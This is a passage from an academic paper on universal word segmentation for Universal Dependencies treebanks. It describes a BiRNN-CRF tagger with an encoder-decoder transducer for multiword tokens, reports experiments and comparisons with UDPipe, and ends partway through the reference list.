corpus properties like genre. In this paper, we thoroughly investigate the corre- lations between the proposed statistical factors and segmentation accuracy. Moreover, we aim to find specific settings that can be applied to improve seg- mentation accuracy for each language group. 4 Sequence Tagging Model Word segmentation can be modelled as a character- level sequence labelling task (Xue, 2003; Chen et al., 2015). Characters as basic input units are passed into a sequence labelling model and a sequence of tags that are associated with word boundaries are predicted. In this section, we introduce the boundary tags adopted in this paper. Theoretically, binary classification is sufficient to indicate whether a character is the end of a word for segmentation. In practice, more fine-grained tagsets result in higher segmentation accuracy (Zhao et al., 2006). Following the work of Shao et al. (2017), we employ a baseline tagset consisting of four tags: B, I, E, and S, to indicate a character positioned at the beginning (B), inside (I), or at the end (E) of a word, or occurring as a single-character word (S). The baseline tagset can be applied to word seg- mentation of Chinese and Japanese without further modification. For languages with space-delimiters, we add an extra tag X to mark the characters, mostly spaces, that do not belong to any words/tokens. As illustrated in Figure 2, the regular spaces are marked with X while the space in a multitoken word like 50 000 is disambiguated with I. To enable the model to simultaneously identify non-segmental multiword tokens for languages like Spanish and Arabic in the UD framework, we ex- tend the tagset by adding four tags B, I, E, S that correspond to B, I, E, S to mark corresponding Tags Applied Languages Baseline Tags B, I, E, S Chinese, Japanese, ... Boundary X Russian, Hindi, ... Transduction B, I, E, S Spanish, Arabic, ... Joint Sent. Seg. T, U All languages Table 3: Tag set for universal word segmentation. positions in non-segmental multiword tokens and to indicate their occurrences. As shown in Figure 2, the multiword token qu’environ is split into qu’ and environ and therefore the corresponding tags are BIEBIIIIIE. This contrasts with du, which should be transduced into de and le. Moreover, the extra tags disambiguate whether the multiword to- kens should be split or transduced according to the context. For instance, AÜØð (wamimma) in Arabic is occasionally split into ð (wa) and AÜØ (mimma) but more frequently transduced into ð (wa), áÓ (min) and AÓ (ma) . The corresponding tags are SBIE and BIIE, respectively. The transduction of the identi- fied multiword tokens will be described in detail in the following section. The complete tagset is summarised in Table 3. The proposed sequence model can easily be ex- tended to perform joint sentence segmentation by adding two more tags to mark the last character of a sentence (de Lhoneux et al., 2017). T is used if the character is a single-character word and U otherwise. T and U can be used together with B, I, E, S, X for general segmentation, or with B, I, E, S additionally for full UD processing. Joint sentence segmentation is not addressed any further in this paper. 5 Neural Networks for Segmentation 5.1 Main network The main network for regular segmentation as well as non-segmental multiword token identification is an adaptation of the BiRNN-CRF model (Huang et al., 2015) (see Figure 3). The input characters can be represented as con- 424 夏天太热 (too) (hot)(summer) character representations GRU GRU GRU GRU forward RNN GRU GRU GRU GRU backward RNN B E S S CRF layer 太热夏天output Figure 3: The BiRNN-CRF model for segmentation. The dashed arrows indicate that dropout is applied. ventional character embeddings. Alternatively, we employ the concatenated 3-gram model introduced by Shao et al. (2017). In this representation (Fig- ure 4), the pivot character in a given context is rep- resented as the concatenation of the character vec- tor representation along with the local bigram and trigram vectors. The concatenated n-grams encode rich local information as the same character has dif- ferent yet closely related vector representations in different contexts. For each n-gram order, we use a single vector to represent the terms that appear only once in the training set while training. These vectors are later used as the representations for unknown characters and n-grams in the development and test sets. All the embedding vectors are initialised ran- domly. The character vectors are passed to the forward and backward recurrent layers. Gated recurrent units (GRU) (Cho et al., 2014) are employed as the basic recurrent cell to capture long term dependencies and sentence-level information. Dropout (Srivastava et al., 2014) is applied to both the inputs and the out- puts of the bidirectional recurrent layers. A first- order chain CRF layer is added on top of the recur- 夏天太热 (too) (hot)(summer) Vi,i Vi−1,i Vi−1,i+1 n-gram character representation V3 Figure 4: Concatenated 3-gram model. The third character is the pivot character in the given context. rent layers to incorporate transition information be- tween consecutive tags, which ensures that the op- timal sequence of tags over the entire sentence is obtained. The optimal sequence can be computed efficiently via the Viterbi algorithm. 5.2 Transduction The non-segmental multiword tokens identified by the main network are transduced into correspond- ing components in an additional step. Based on the statistics of the multiword tokens to be trans- duced on the entire UD training sets, 98.3% only have one possible transduction, which indicates that the main ambiguity of non-segmental multiword to- kens comes with identification, not transduction. We therefore transduce the identified non-segmental multiword tokens in a context-free fashion. For mul- tiword tokens with two or more valid transductions, we only adopt the most frequent one. In most languages that have multiword tokens, the number of unique non-segmental multiword to- kens is rather limited, such as in Spanish, French and Italian. For these languages, we build dictionar- ies from the training data to look up the multiword tokens. However, in some languages like Arabic and Hebrew, multiword tokens are very productive and therefore cannot be well covered by dictionar- ies generated from training data. Some of the avail- able external dictionary resources with larger cover- age, for instance the MILA lexicon (Itai and Wint- ner, 2008), do not follow the UD standards. In this paper, we propose a generalising ap- proach to processing non-segmental multiword to- kens. If there are more than 200 unique multi- word tokens in the training set for a language, we 425 Character embedding size 50 GRU/LSTM state size 200 Optimiser Adagrad Initial learning rate (main) 0.1 Decay rate 0.05 Gradient Clipping 5.0 Initial learning rate (encoder-decoder) 0.3 Dropout rate 0.5 Batch size 10 Table 4: Hyper-parameters for segmentation. train an attention-based encoder-decoder (Bahdanau et al., 2015) equipped with shared long-short term memory cells (LSTM) (Hochreiter and Schmidhu- ber, 1997). At test time, identified non-segmental multiword tokens are first queried in the dictionary. If not found, the segmented components are gen- erated with the encoder-decoder as character-level transduction. Overall, we utilise rich context to identify non-segmental multiword tokens, and then apply a combination of dictionary and sequence-to- sequence encoder-decoder to transduce them. 5.3 Implementation Our universal word segmenter is implemented us- ing the TensorFlow library (Abadi et al., 2016). Sentences with similar lengths are grouped into the same bucket and padded to the same length. We construct sub-computational graphs for each bucket so that sentences of different lengths are processed more efficiently. Table 4 shows the hyper-parameters adopted for the neural networks. We use one set of parame- ters for all the experiments as we aim for a sim- ple universal model, although fine-tuning the hyper- parameters on individual languages might result in additional improvements. The encoder-decoder is trained prior to the main network. The weights of the neural networks, including the embeddings, are initialised using the scheme introduced in Glo- rot and Bengio (2010). The network is trained us- ing back-propagation. All the random embeddings are fine-tuned during training by back-propagating gradients. Adagrad (Duchi et al., 2011) with mini- batches is employed for optimization. The initial learning rate η0 is updated with a decay rate ρ. The encoder-decoder is trained with the unique non-segmental multiword tokens extracted from the training set. 5% of the total instances are subtracted for validation. The model is trained for 50 epochs and the score of how many outputs exactly match the references is used for selecting the weights. For the main network, word-level F1-score is used to measure the performance of the model after each epoch on the development set. The network is trained for 30 epochs and the weight of the best epoch is selected. To increase efficiency and reduce memory de- mand both for training and decoding, we truncate sentences longer than 300 characters. At decoding time, the truncated sentences are reassembled at the recorded cut-off points in a post-processing step. 6 Experiments 6.1 Datasets and Evaluation Datasets from Universal Dependencies 2.0 (Nivre et al., 2016) are used for all the word segmentation ex- periments.3 In total, there are 81 datasets in 49 lan- guages that vary substantially in size. The training sets are available in 45 languages. We follow the standard splits of the datasets. If no development set is available, 10% of the training set is subtracted. We adopt word-level precision, recall and F1- score as the evaluation metrics. The candidate and the reference word sequences in our experiments may not share the same underlying characters due to the transduction of non-segmental multiword to- kens. The alignment between the candidate words and the references becomes unclear and therefore it is difficult to compute the associated scores. To re- solve this issue, we use the longest common subse- quence algorithm to align the candidate and the ref- erence words. The matched words are compared and the evaluation scores are computed accordingly: R = |c∩r| |r| (1) P = |c∩r| |c| (2) F = 2 · R ·P R + P (3) where c and r denote the sequences of candidate words and reference words, and |c|, |r| are their 3We employ the version that was used in the CoNLL 2017 shared task on UD parsing. 426 Basic Unit F1-score Training Time (s) Latin Character 82.79 572 Space-delimited Unit 87.62 218 Table 5: Different segmentation units employed for word segmentation on Vietnamese. Concatenated 3- gram is not used. lengths. |c∩r| is the number of candidate words that are aligned to reference words by the longest com- mon subsequence algorithm. The word-level evalu- ation metrics adopted in this paper are different from the boundary-based alternatives (Palmer and Burger, 1997). We adapt the evaluation script from the CoNLL 2017 shared task (Zeman et al., 2017) to calculate the scores. In the following experiments, we only report the F1-score. In the following sections, we thoroughly investi- gate correlations between several language-specific characteristics and segmentation accuracy. All the experimental results in Section 6.2 are obtained on the development sets. The test sets are reserved for final evaluation, reported in Section 6.3. 6.2 Language-Specific Characteristics 6.2.1 Word-Internal Spaces For Vietnamese and other languages with sim- ilar historical backgrounds, such as Zhuang and Hmongic languages (Zhou, 1991), the space- delimited syllables containing no punctuation are never segmented but joined into words with word- internal spaces instead. The space-delimited units can therefore be applied as the basic elements for tag prediction if we pre-split punctuation. Word seg- mentation for these languages thus becomes practi- cally the same as for Chinese and Japanese. Table 5 shows that a substantial improvement can be achieved if we use space-delimited syllables as the basic elements for word segmentation for Viet- namese. It also drastically increases both training and decoding speed as the sequence of tags to be predicted becomes much shorter. 6.2.2 Character Representation We apply regular character embeddings and con- catenated 3-gram vectors introduced in Section 5.1 to the input characters and test their performances 1 2 3 4 5 6 7 8 9 10 0.8 0.9 1 N/300 F 1- S co re Arabic Catalan Chinese English Japanese Spanish Figure 5: Segmentation results with unigram char- acter embeddings (dashed) and concatenated 3-gram vectors for character representations with different numbers of training instances N. respectively. First, the experiments are extensively conducted on all the languages with the full train- ing sets. The results show that the concatenated 3-gram model is substantially better than the regu- lar character embeddings on Chinese, Japanese and Vietnamese, but notably worse on Spanish and Cata- lan. For all the other languages, the differences are marginal. To gain more insights, we select six languages, namely Arabic, Catalan, Chinese, Japanese, English and Spanish for more detailed analysis via learn- ing curve experiments. The training sets are grad- ually extended by 300 sentences at a time. The results are shown in Figure 5. Regardless of the amounts of training data and the other typological factors, concatenated 3-grams are better on Chinese and Japanese and worse on Spanish and Catalan. We expect the concatenated 3-gram representation to outperform simple character embeddings on all languages with a large character set but no space de- limiters. Since adopting the concatenated 3-gram model drastically enlarges the embedding space, in the following experiments, including the final testing phase, concatenated 3-grams are only applied to Chinese, Japanese and Vietnamese. 427 1 2 3 4 5 6 7 8 9 10 0.6 0.7 0.8 0.9 1 N/300 F 1- S co re Arabic Chinese English Korean Russian Spanish Figure 6: Segmentation results with (dashed) and without space delimiters with different numbers of training instances N. 6.2.3 Space Delimiters Chinese and Japanese are not delimited by spaces. Additionally, continuous writing without spaces (scriptio continua) is evidenced in most Classical Greek and Latin manuscripts. We perform two sets of learning curve experiments to investigate the im- pact of white space on word segmentation. In the first set, we keep the datasets in their original forms. In the second set, we omit all white space. The ex- perimental results are presented in Figure 6. In general, there are huge discrepancies between the accuracies with and without spaces, showing that white space acts crucially as a word boundary in- dicator. Retaining the original forms of the space- delimited languages, very high accuracies can be achieved even with small amounts of training data as the model quickly learns that space is a reliable word boundary indicator. Moreover, we obtain rel- atively lower scores on space-delimited languages when space is ignored than Chinese using compara- ble amounts of training data, which shows that Chi- nese characters are more informative to word bound- ary prediction, due to the large character set size. 6.2.4 Non-Segmental Multiword Tokens The concept of multiword tokens is specific to UD. To explore how the non-segmental multiword tokens, as opposed to pure segmentation, influence 1 2 3 4 5 6 7 8 9 10 0.8 0.9 1 N/300 F 1- S co re Arabic French Hebrew Italian Portuguese Spanish Figure 7: Segmentation results with and without (dashed) processing non-segmental multiword to- kens with different training instances N. Language Data size Evaluation Scores Training Validation ACC MFS Arabic 3,500 184 77.84 82.64 Hebrew 2,995 157 84.81 92.35 Table 6: Accuracy of the seq2seq transducer on Ara- bic and Hebrew. segmentation accuracy, we conduct relevant experi- ments on selected languages. Similarly to the previ- ous section, two sets of learning curve experiments are performed. In the second set, all the multiword tokens that require transduction are regarded as sin- gle words without being processed. The results are presented in Figure 7. Word segmentation with full UD processing is no- tably more challenging for Arabic and Hebrew. Ta- ble 6 shows the evaluation of the encoder-decoder as the transducer for non-segmental multiword tokens on Arabic and Hebrew. The evaluation metrics ACC and MF-score (MFS) are adapted from the metrics used for machine transliteration evaluation (Li et al., 2009). ACC is exact match and MFS is based on edit distance. The transducer yields relatively higher scores on Hebrew while it is more challenging to process Arabic. In addition, different approaches to transducing the non-segmental multiword tokens are evaluated in Table 7. In the condition None, the identified non- 428 None Dictionary Transducer Mix Arabic 94.11 96.74 96.54 97.27 Hebrew 87.17 91.33 88.46 91.85 Table 7: Segmentation accuracies on Arabic and Hebrew with different ways of transducing non- segmental multiword tokens. segmental multiword tokens remain unprocessed. In Dictionary, they are mapped via the dictionary de- rived from training data if found in the dictionary. In Transducer, they are all transduced by the attention- based encoder-decoder. In Mix, in addition to utilis- ing the mapping dictionary, the non-segmental terms not found in the dictionary are transduced with the encoder-decoder. The results show that when the encoder-decoder is applied alone, it is worse than only using the dictionaries, but additional improve- ments can be obtained by combining both of them. The accuracy differences associated with non- segmental multiword tokens are nonetheless marginal on the other languages as shown in Figure 7. Regardless of their frequent occurrences, mul- tiword tokens are easy to process in general when the set of unique non-segmental multiword tokens is small. 6.2.5 Correlations with Accuracy We investigate the correlations between the pro- posed typological factors in Section 3 and segmen- tation accuracy using linear regression with Huber loss (Huber, 1964). The factors are used in addition to training set size as the features to predict the seg- mentation accuracies in F1-score. To collect more data samples, apart from experimenting with the full training data for each set, we also use smaller sets of 500, 1,000 and 2,000 training instances to train the models respectively if the training set is large enough. The features are standardised with the arith- metic mean and the standard deviation before fitting the linear regression model. The correlation coefficients of the linear regres- sion model are presented in Figure 8. We can see that segmentation frequency and multiword token set size are negatively correlated with segmentation accuracy. Overall, the UD datasets are strongly bi- ased towards space-delimited languages. Training set size is therefore not a strong factor as high accu- TS CS LS AL SF MP MS −1 0 1 ·10−2 Figure 8: Correlation coefficients between segmen- tation accuracy and the typological factors in the lin- ear regression model. The factors are training set size (TS), character set size (CS), lexicon size (LS), average word length (AL), segmentation frequency (SF), multitoken word portion (MP) and multitoken word size (MS). racies can be obtained with small amounts of train- ing data, which is consistent with the results of all the learning curve experiments. The other typolog- ical factors such as average word length and lexi- con size are less relevant to segmentation accuracy. Referring back to Figure 1, segmentation frequency and multiword token set size as the most influen- tial factors, are also the primary principal compo- nents that categorise the UD languages into different groups. 6.2.6 Language-Specific Settings Our model obtains competitive results with only a minimal number of straightforward language- specific settings. Based on the previous analysis of segmentation accuracy and typological factors, re- ferring back to Figure 1, we apply the following settings, targeting on specific language groups, to the segmentation system on the final test sets. The language-specific settings can be applied to new lan- guages beyond the UD datasets based on an analysis of the typological factors. 1. For languages with word-internal spaces like Vietnamese, we first separate punctuation and then use space-delimited syllables for bound- 429 Space NLTK UDPipe This Paper 80.86 95.64 99.47 99.45 Table 8: Average evaluation scores on UD lan- guages, excluding Chinese, Japanese, Vietnamese, Arabic and Hebrew. ary prediction. 2. For languages with large character sets and no space delimiters, like Chinese and Japanese, we use concatenated 3-gram representations. 3. For languages with more than 200 unique non- segmental multiword tokens, like Arabic and Hebrew, we use the encoder-decoder model for transduction. 4. For other languages, the universal model is suf- ficient without any specific adaptation. 6.3 Final Results We compare our segmentation model to UDPipe (Straka and Straková, 2017) on the test sets. UDPipe contains word segmentation, POS tagging, morpho- logical analysis and dependency parsing models in a pipeline. The word segmentation model in UD- Pipe is also based on RNN with GRU. For efficiency, UDPipe has a smaller character embedding size and no CRF interface. It also relies heavily on white- space and uses specific configurations for languages in which word-internal spaces are allowed. Auto- matically generated suffix rules are applied jointly with a dictionary query to handle multiword tokens. Moreover, UDPipe uses language-specific hyper- parameters for Chinese and Japanese. We employ UDPipe 1.2 with the publicly avail- able UD 2.0 models.4 The presegmented option is enabled as we assume the input text to be preseg- mented into sentences so that only word segmen- tation is evaluated. In addition, the CoNLL shared task involved some test sets for which no specific training data were available. This included a number of parallel test sets of known languages, for which we apply the models trained on the standard tree- banks, as well as four surprise languages, namely Buryat, Kurmanji, North Sami and Upper Sorbian, for which we use the small annotated data samples provided in addition to the test sets by the shared 4http://hdl.handle.net/11234/1-2364 task to build models and evaluation on those lan- guages. The main evaluation results are shown in Table 9. We also report the Macro Average F1-scores. The scores of the surprise languages are excluded and presented separately as no corresponding UDPipe models are available. Our system obtains higher segmentation accuracy overall. It achieves substantially better accuracies on languages that are challenging to segment, namely Chinese, Japanese, Vietnamese, Arabic and Hebrew. The two systems yield very similar scores, when these languages are excluded as shown in Table 8, in which the two systems are also compared with two rule-based baselines, a simple space-based to- keniser and the tokenisation model for English in NLTK (Loper and Bird, 2002). The NLTK model obtains relatively high accuracy while the space- based baseline substantially underperforms, which indicates that relying on white space alone is insuffi- cient for word segmentation in general. On the ma- jority of the space-delimited languages without pro- ductive non-segmental multiword tokens, both UD- Pipe and our segmentation system yield near-perfect scores in Table 9. In general, referring back to Fig- ure 1, languages that are clustered at the bottom-left corner are relatively trivial to segment. The evaluation scores are notably lower on Semitic languages as well as languages without word delimiters. Nonetheless, our system obtains substantially higher scores on the languages that are more challenging to process. For Chinese, Japanese and Vietnamese, our sys- tem benefits substantially from the concatenated 3-gram character representation, which has been demonstrated in Section 6.2.2. Besides, we em- ploy a more fine-grained tagset with CRF loss in- stead of the binary tags adopted in UDPipe. As presented in Zhao et al. (2006), more fine-grained tagging schemes outperform binary tags, which is supported by the experimental results on morpheme segmentation reported in Ruokolainen et al. (2013). We further investigate the merits of the fine- grained tags over the binary tags as well as the ef- fectiveness of the CRF interface by the experiments presented in Table 10 with the variances of our seg- mentation system. The fine-grained tags denote the boundary tags introduced in Table 3. The binary 430 Dataset UDPipe This Paper Dataset UDPipe This Paper Dataset UDPipe This Paper Ancient Greek 99.98 99.96 Ancient Greek-PROIEL 99.99 100.0 Arabic 93.77 97.16 Arabic-PUD 90.92 95.93 Basque 99.97 100.0 Bulgarian 99.96 99.93 Catalan 99.98 99.80 Chinese 90.47 93.82 Croatian 99.88 99.95 Czech 99.94 99.97 Czech-CAC 99.96 99.93 Czech-CLTT 99.58 99.64 Czech-PUD 99.34 99.62 Danish 99.83 100.0 Dutch 99.84 99.92 Dutch-LassySmall 99.91 99.96 English 99.05 99.13 English-LinES 99.90 99.95 English-PUD 99.69 99.71 English-ParTUT 99.60 99.51 Estonian 99.90 99.88 Finnish 99.57 99.74 Finnish-FTB 99.95 99.99 Finnish-PUD 99.64 99.39 French 98.81 99.39 French-PUD 98.84 97.23 French-ParTUT 98.97 99.32 French-Sequoia 99.11 99.48 Galician 99.94 99.97 Galician-TreeGal 98.66 98.07 German 99.58 99.64 German-PUD 97.94 97.74 Gothic 100.0 100.0 Greek 99.94 99.86 Hebrew 85.16 91.01 Hindi 100.0 100.0 Hindi-PUD 98.26 98.82 Hungarian 99.79 99.93 Indonesian 100.0 100.0 Irish 99.38 99.85 Italian 99.83 99.54 Italian-PUD 99.21 98.78 Japanese 92.03 93.77 Japanese-PUD 93.67 94.17 Kazakh 94.17 94.21 Korean 99.73 99.95 Latin 99.99 100.0 Latin-ITTB 99.94 100.0 Latin-PROIEL 99.90 100.0 Latvian 99.16 99.56 Norwegian-Bokmaal 99.83 99.89 Norwegian-Nynorsk 99.91 99.97 Old Church Slavonic 100.0 100.0 Persian 99.65 99.62 Polish 99.90 99.93 Portuguese 99.59 99.10 Portuguese-BR 99.85 99.52 Portuguese-PUD 99.40 98.98 Romanian 99.68 99.74 Russian 99.66 99.96 Russian-PUD 97.09 97.28 Russian-SynTagRus 99.64 99.65 Slovak 100.0 99.98 Slovenian 99.93 100.0 Slovenian-SST 99.91 100.0 Spanish 99.75 99.85 Spanish-AnCora 99.94 99.93 Spanish-PUD 99.44 99.39 Swedish 99.79 99.97 Swedish-LinES 99.93 99.98 Swedish-PUD 98.36 99.26 Turkish 98.09 97.85 Turkish-PUD 96.99 96.68 Ukrainian 99.81 99.76 Urdu 100.0 100.0 Uyghur 99.85 97.86 Vietnamese 85.53 87.79 Average 98.63 98.90 Table 9: Evaluation results on the UD test sets in F1-scores. The datasets are represented in the correspond- ing treebank codes. PUD suffix indicates the parallel test data. Two shades of green/red are used for better visualisation, with brighter colours for larger differences. Green represents that our system is better than UDPipe and red is used otherwise. BT BT+CRF FT FT+CRF Chinese 90.54 90.66 90.73 91.28 Japanese 91.54 91.64 91.88 91.94 Vietnamese 87.63 87.95 87.61 87.75 Arabic 94.47 96.74 94.73 97.16 Hebrew 85.34 90.74 85.53 91.98 Table 10: Comparison between the binary tags (BT) and the fine-grained tags (FT) as well as the effec- tiveness of the CRF interface on the development sets. tags include two basic tags B, I plus the correspond- ing tags B, I for non-segmental multiword tokens. White space is marked as I instead of X. The con- catenated 3-grams are not applied. In general, the experimental results confirm that the fine-grained tags are more beneficial except for Vietnamese. The fine-grained tagset contains more structured posi- tional information that can be exploited by the word segmentation model. Additionally, the CRF in- terface leads to notable improvements, especially Arabic French German Hebrew UDPipe 79.34 98.91 94.21 71.87 Our model 91.35 97.50 94.21 86.17 Table 11: Percentages of the correctly processed multiword tokens on the development sets. for Arabic and Hebrew. The combination of the fine-grained tags with the CRF interface achieves substantial improvements over the basic binary tag model that is analogous to UDPipe. For Arabic and Hebrew, apart from greatly bene- fiting from the fine-grained tagset and the CRF inter- face, our model is better at handling non-segmental multiword tokens (Table 11). The attention-based encoder-decoder as the transducer is much more powerful in processing the non-segmental multi- word tokens that are not covered by the dictionary than the suffix rules for analysing multiword tokens in UDPipe. UDPipe obtains higher scores on a few datasets. Our model overfits the small training data of Uyghur 431 Segmentation UDPipe parser Dozat et al. (2017) Accuracy UAS LAS UAS LAS UDPipe This Paper UDPipe This Paper UDPipe This Paper UDPipe This Paper UDPipe This Paper Arabic 93.77 97.16 72.34 78.22 66.41 71.79 77.52 83.55 72.89 78.42 Chinese 90.47 93.82 63.20 67.91 59.07 63.31 71.24 76.33 68.20 73.04 Hebrew 85.16 91.01 62.14 71.18 57.82 66.59 67.61 76.39 64.02 72.37 Japanese 92.03 93.77 78.08 81.77 76.73 80.83 80.21 83.79 79.44 82.99 Vietnamese 85.53 87.79 47.72 50.87 43.10 46.03 50.28 53.78 45.54 48.86 Table 12: Extrinsic evaluations with dependency parsing on the test sets. The parsing accuracies are reported in unlabelled attachment score (UAS) and labelled attachment score (LAS). Space NLTK Sample Transfer Buryat 71.99 97.99 88.07 97.99 (Russian) Kurmanji 78.97 97.37 93.37 96.71 (Spanish) North Sami 79.07 99.20 92.82 99.81 (German) Upper Sorbian 72.35 94.60 93.34 93.66 (Spanish) Table 13: Evaluation on the surprise languages. as it yields 100.0 F1-score on the development set. For a few parallel test sets, there are punctuation marks not found in the training data that cannot be correctly analysed by our system as it is fully data- driven without any heuristic rules for unknown char- acters. The evaluation results on the surprise languages are presented in Table 13. In addition to the seg- mentation models proposed in this paper, we present the evaluation scores of a space-based tokeniser as well as the NLTK model for English. As shown by the previous learning curve experiments in Sec- tion 6.2, very high accuracies can be obtained on the space-delimited languages with only small amounts of training data. However, in case of extreme data sparseness (less than 20 training sentences), such as for the four surprise languages in Table 13 and Kazakh in Table 9, the segmentation results are dras- tically lower even though the surprise languages are all space-delimited. For the surprise languages, we find that applying segmentation models trained on a different language with more training data yields better results than re- lying on the small annotated samples of the target language. Considering that the segmentation model is fully character-based, we simply select the model of the language that shares the most characters with the surprise language as its segmentation model. No annotated data of the surprise language are used for model selection. As shown in Table 13, the transfer approach achieves comparable segmentation accu- racies to NLTK. For space-delimited languages with insufficient training data, it may be beneficial to em- ploy a well-designed rule-based word segmenter as NLTK occasionally outperforms the data-driven ap- proach. As a form of extrinsic evaluation, we test the seg- menter in a dependency parsing setup on the datasets where we obtained substantial improvements over UDPipe. We present results for the transition-based parsing model in UDPipe 1.2 and for the graph- based parser by Dozat et al. (2017). The experimen- tal results are shown in Table 12. We can see that word segmentation accuracy has a great impact on parsing accuracy as the segmentation errors propa- gate. Having a more accurate word segmentation model is very beneficial for achieving higher pars- ing accuracy. 7 Related Work The BiRNN-CRF model is proposed by Huang et al. (2015) and has been applied to a number of se- quence labelling tasks, such as part-of-speech tag- ging, chunking and named entity recognition. Our universal word segmenter is a major exten- sion of the joint word segmentation and POS tagging system described by Shao et al. (2017). The origi- nal model is specifically developed for Chinese and only applicable to Chinese and Japanese. Apart from being language-independent, the proposed model in this paper employs an extended tagset and a comple- mentary sequence transduction component to fully process non-segmental multiword tokens that are present in a substantial amount of languages, such as Arabic and Hebrew in particular. It is a gener- alised segmentation and transduction framework. Our universal model is compared with the 432 This Paper Shao Che Björkelund Chinese 93.82 95.21 91.19 92.81 Japanese 93.77 94.79 92.95 91.68 Arabic 97.16 – 93.71 95.53 Hebrew 91.01 – 85.16 91.37 Table 14: Comparison between the universal model and the language-specific models. language-specific model of Shao et al. (2017) in Ta- ble 14. With pretrained character embeddings, en- semble decoding and joint POS tags prediction as introduced in Shao et al. (2017), considerable im- provements over the universal model presented in this paper can be obtained. However, the joint POS tagging system is difficult to generalise as single characters in space-delimited languages are usually not informative for POS tagging. Additionally, com- pared to Chinese, sentences in space-delimited lan- guages have a much greater number of characters on average. Combining the POS tags with segmenta- tion tags drastically enlarges the search space and therefore the model becomes extremely inefficient both for training and tagging. The joint POS tag- ging model is nonetheless applicable to Japanese and Vietnamese. Monroe et al. (2014) present a data-driven word segmentation system for Arabic based on a sequence labelling framework. An extended tagset is designed for Arabic-specific orthographic rules and applied together with hand-crafted features in a CRF frame- work. It obtains 98.23 F1-score on newswire Ara- bic Treebank,5 97.61 on Broadcast News Treebank,6 and 92.10 on the Egyptian Arabic dataset.7 For He- brew, Goldberg and Elhadad (2013) perform word segmentation jointly with syntactic disambiguation using lattice parsing. Each lattice arc corresponds to a word and its corresponding POS tag, and a path through the lattice corresponds to a specific word segmentation and POS tagging of the sentence. The proposed model is evaluated on the Hebrew Tree- bank (Guthmann et al., 2009). The joint word seg- mentation and parsing F1-score (76.95) is reported and compared against the parsing score (85.70) with gold word segmentation. The evaluation scores re- 5LDC2010T13, LDC2011T09, LDC2010T08 6LDC2012T07 7LDC2012E93,98,89,99,107,125, LDC2013E12,21 ported in both Monroe et al. (2014) and Goldberg and Elhadad (2013) are not directly comparable to the evaluation scores on Arabic and Hebrew in this paper, as they are obtained on different datasets. For universal word segmentation, apart from UD- Pipe described in Section 6.3, there are several systems that are developed for specific language groups. Che et al. (2017) build a similar Bi-LSTM word segmentation model targeting languages with- out space delimiters like Chinese and Japanese. The proposed model incorporates rich statistics-based features gathered from large-scale unlabelled data, such as character unigram embeddings, character bigram embeddings and the point-wise mutual in- formation of adjacent characters. Björkelund et al. (2017) use a CRF-based tagger for multiword token rich languages like Arabic and Hebrew. A predicted Levenshtein edit script is employed to transform the multiword tokens into their components. The evalu- ation scores on a selected set of languages reported in Che et al. (2017) and Björkelund et al. (2017) are included in Table 14 as well. More et al. (2018) adapt existing morphologi- cal analysers for Arabic, Hebrew and Turkish and present ambiguous word segmentation possibilities for these languages in a lattice format (CoNLL- UL) that is compatible with UD. The CoNLL-UL datasets can be applied as external resources for pro- cessing non-segmental multiword tokens.8 8 Conclusion We propose a sequence tagging model and apply it to universal word segmentation. BiRNN-CRF is adopted as the fundamental segmentation frame- work that is complemented by an attention-based sequence-to-sequence transducer for non-segmental multiword tokens. We propose six typological fac- tors to characterise the difficulty of word segmen- tation cross different languages. The experimental results show that segmentation accuracy is primarily correlated with segmentation frequency as well as the set of non-segmental multiword tokens. Using whitespace as delimiters is crucial to word segmen- tation, even if the correlation between orthographic tokens and words is not perfect. For space-delimited 8CoNLL-UL is not evaluated in our experiments as it is very recent work. 433 languages, very high accuracy can be obtained even with relatively small training sets, while more train- ing data is required for high segmentation accuracy for languages without spaces. Based on the analy- sis, we apply a minimal number of language-specific settings to substantially improve the segmentation accuracy for languages that are fundamentally more difficult to process. The segmenter is extensively evaluated on the UD datasets in various languages and compared with UDPipe. Apart from obtaining nearly perfect segmentation on most of the space-delimited lan- guages, our system achieves high accuracies on lan- guages without space delimiters such as Chinese and Japanese as well as Semitic languages with abundant multiword tokens like Arabic and Hebrew. Acknowledgments We acknowledge the computational resources pro- vided by CSC in Helsinki and Sigma2 in Oslo through NeIC-NLPL (www.nlpl.eu). This work is supported by the Chinese Scholarship Council (CSC) (No. 201407930015). We would like to thank the TACL editors and reviewers for their valuable feedback. References Martı́n Abadi, Paul Barham, Jianmin Chen, Zhifeng Chen, Andy Davis, Jeffrey Dean, Matthieu Devin, Sanjay Ghemawat, Geoffrey Irving, Michael Isard, et al. 2016. TensorFlow: A system for large-scale machine learning. In Proceedings of the 12th USENIX Symposium on Operating Systems Design and Imple- mentation (OSDI), pages 265–283. Hervé Abdi and Lynne J Williams. 2010. Principal component analysis. Wiley Interdisciplinary Reviews: Computational Statistics, 2(4):433–459. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In International Con- ference on Learning Representations. Anders Björkelund, Agnieszka Falenska, Xiang Yu, and Jonas Kuhn. 2017. IMS at the CoNLL 2017 UD shared task: CRFs and perceptrons meet neural net- works. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 40–51. Wanxiang Che, Jiang Guo, Yuxuan Wang, Bo Zheng, Huaipeng Zhao, Yang Liu, Dechuan Teng, and Ting Liu. 2017. The HIT-SCIR system for end-to-end pars- ing of universal dependencies. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies, pages 52–62. Xinchi Chen, Xipeng Qiu, Chenxi Zhu, Pengfei Liu, and Xuanjing Huang. 2015. Long short-term mem- ory neural networks for Chinese word segmentation. In Conference on Empirical Methods in Natural Lan- guage Processing, pages 1197–1206. Kyunghyun Cho, Bart Van Merriënboer, Dzmitry Bah- danau, and Yoshua Bengio. 2014. On the properties of neural machine translation: Encoder-decoder ap- proaches. arXiv preprint arXiv:1409.1259. Miryam de Lhoneux, Yan Shao, Ali Basirat, Eliyahu Kiperwasser, Sara Stymne, Yoav Goldberg, and Joakim Nivre. 2017. From raw text to Universal De- pendencies – look, no tags! In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal Dependencies., pages 207–217. Timothy Dozat, Peng Qi, and Christopher D. Man- ning. 2017. Stanford’s graph-based neural depen- dency parser at the CoNLL 2017 shared task. In Pro- ceedings of the CoNLL 2017 Shared Task: Multilin- gual Parsing from Raw Text to Universal Dependen- cies, pages 20–30, Vancouver, Canada, August. Asso- ciation for Computational Linguistics. John Duchi, Elad Hazan, and Yoram Singer. 2011. 